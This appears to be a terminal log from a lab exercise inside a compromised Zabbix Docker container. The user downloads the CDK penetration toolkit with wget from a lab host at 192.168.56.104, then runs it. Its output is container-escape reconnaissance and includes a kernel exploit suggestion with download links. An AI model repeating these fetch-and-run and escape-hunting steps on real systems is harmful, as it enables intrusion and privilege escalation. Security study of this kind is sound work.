1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120
| /var/lib/zabbix $ wget 192.168.56.104/cdk_linux_amd64 Connecting to 192.168.56.104 (192.168.56.104:80) saving to 'cdk_linux_amd64' cdk_linux_amd64 3% |* | 345k 0:00:28 ETA cdk_linux_amd64 100% |********************************| 9.9M 0:00:00 ETA 'cdk_linux_amd64' saved /var/lib/zabbix $ chmod +x cdk_linux_amd64 /var/lib/zabbix $ ./cdk_linux_amd64 eva --full CDK (Container DucK) CDK Version(GitCommit): b4105424a2f329020c388e6e16a42e9bb31ef501 Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
[ Information Gathering - System Info ] 2026/05/03 07:46:45 current dir: /var/lib/zabbix 2026/05/03 07:46:45 current user: zabbix uid: 1997 gid: 1995 home: /var/lib/zabbix/ 2026/05/03 07:46:45 hostname: 2dd0e7252ced 2026/05/03 07:46:45 alpine alpine 3.20.0 kernel: 6.12.74-0-lts 2026/05/03 07:46:45 Setuid files found: /bin/ping
[ Information Gathering - Services ]
[ Information Gathering - Commands and Capabilities ] 2026/05/03 07:46:45 available commands: wget,nc,find,ps,mysql,vi,capsh,mount,fdisk,base64,perl 2026/05/03 07:46:45 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb): CapInh: 0000000000000000 CapPrm: 0000000000000000 CapEff: 0000000000000000 CapBnd: 00000000a80425fb CapAmb: 0000000000000000 Cap decode: 0x0000000000000000 = [*] Maybe you can exploit the Capabilities below:
[ Information Gathering - Mounts ] 0:38 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/UK5UJDRYUVN2ZATQAGFEXRO6AP:/var/lib/docker/overlay2/l/6P27DZ2RO67CX4AREXCRYCLWTY:/var/lib/docker/overlay2/l/IV3RQW6FELY42VOU462P54NSAZ:/var/lib/docker/overlay2/l/46KWW56F5PKZ3RZDF7OZVABSTU:/var/lib/docker/overlay2/l/32UICHBPK773K3NOSD2NQ4UWL6:/var/lib/docker/overlay2/l/AFUZJ5EB44SKUY55XW5DV3XEL4:/var/lib/docker/overlay2/l/ZCW27FASKGHCM4WWBUCE5HYAI6:/var/lib/docker/overlay2/l/CUHFSYZQE6AP6NRUNSEYSWIM4R:/var/lib/docker/overlay2/l/TKNZGH62744YPTLCS4XTYBPIPW,upperdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/diff,workdir=/var/lib/docker/overlay2/3e28dc9d348bf20dd2384f6cb48e3213860bc6ff12db58eca61119d926736b3f/work 0:104 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw 0:105 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64 0:106 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666 0:107 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro 0:29 / /sys/fs/cgroup ro,nosuid,nodev,noexec,relatime - cgroup2 cgroup rw,nsdelegate 0:95 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw 0:109 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k,inode64 8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/sda3 rw 8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hostname /etc/hostname rw,relatime - ext4 /dev/sda3 rw 8:3 /var/lib/docker/containers/2dd0e7252cedcc056ceff16844d14b26ad7b6f6f2436576ec641dfa071cfa8b1/hosts /etc/hosts rw,relatime - ext4 /dev/sda3 rw 8:3 /var/lib/docker/volumes/8b1f467d01e96dbfe0183c44542a180401913a255c02ea54c4b851d945cde742/_data /var/lib/zabbix/export rw,relatime - ext4 /dev/sda3 rw 8:3 /var/lib/docker/volumes/5f448f607d5d377e56d38fdd8feb779d55f20fd4a2a457ae149ff0d45c1bf3a0/_data /var/lib/zabbix/snmptraps rw,relatime - ext4 /dev/sda3 rw 0:104 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw 0:104 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw 0:104 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw 0:104 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw 0:104 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw 0:138 / /proc/asound ro,relatime - tmpfs tmpfs ro,inode64 0:139 / /proc/acpi ro,relatime - tmpfs tmpfs ro,inode64 0:105 /null /proc/interrupts rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64 0:105 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64 0:105 /null /proc/latency_stats rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64 0:105 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755,inode64 0:140 / /proc/scsi ro,relatime - tmpfs tmpfs ro,inode64 0:141 / /sys/firmware ro,relatime - tmpfs tmpfs ro,inode64
[ Information Gathering - Net Namespace ] container net namespace isolated.
[ Information Gathering - Sysctl Variables ] 2026/05/03 07:46:45 net.ipv4.conf.all.route_localnet = 0
[ Information Gathering - DNS-Based Service Discovery ] error when requesting coreDNS: lookup any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 127.0.0.11:53: server misbehaving
[ Discovery - K8s API Server ] 2026/05/03 07:46:45 checking if api-server allows system:anonymous request. err found while searching local K8s apiserver addr.: err: cannot find kubernetes api host in ENV api-server forbids anonymous request. response:
[ Discovery - K8s Service Account ] load K8s service account token error.: open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
[ Discovery - Cloud Provider Metadata API ] 2026/05/03 07:46:45 failed to dial Alibaba Cloud API. 2026/05/03 07:46:45 failed to dial Azure API. 2026/05/03 07:46:45 failed to dial Google Cloud API. 2026/05/03 07:46:46 failed to dial Tencent Cloud API. 2026/05/03 07:46:47 failed to dial OpenStack API. 2026/05/03 07:46:48 failed to dial Amazon Web Services (AWS) API. 2026/05/03 07:46:49 failed to dial ucloud API.
[ Exploit Pre - Kernel Exploits ] 2026/05/03 07:46:49 refer: https://github.com/mzet-/linux-exploit-suggester [+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: less probable Tags: ubuntu=20.04{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded
[ Information Gathering - Sensitive Files ] .dockerenv - /.dockerenv /.bash_history - /var/lib/zabbix/.bash_history
[ Information Gathering - ASLR ] 2026/05/03 07:47:01 /proc/sys/kernel/randomize_va_space file content: 2 2026/05/03 07:47:01 ASLR is enabled.
[ Information Gathering - Cgroups ] 2026/05/03 07:47:01 /proc/1/cgroup file content: 0::/ 2026/05/03 07:47:01 /proc/self/cgroup file added content (compare pid 1) : /var/lib/zabbix $
|